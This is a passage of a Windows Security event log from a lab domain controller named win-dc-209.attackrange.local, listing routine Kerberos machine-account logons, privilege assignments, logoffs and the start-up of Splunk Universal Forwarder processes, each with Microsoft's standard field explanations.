OpCode=Info
RecordNumber=264828
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x875FB4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53730
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264827
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875FB4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264826
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x875F6C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264825
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875F6C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264824
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x875E7E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53729
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264823
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875E7E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264822
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcc4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264835
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264834
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x158c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264833
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875E7E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264832
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875F6C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264831
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875FB4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264830
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x876089
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53733
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264829
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x876089
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264836
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264837
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x56c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264839
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264838
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x148c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264840
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x876089
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264843
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8792D6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264842
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8792D6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53744
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264841
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8792D6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:40:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264844
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1648
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264846
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264845
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x7ac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264847
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
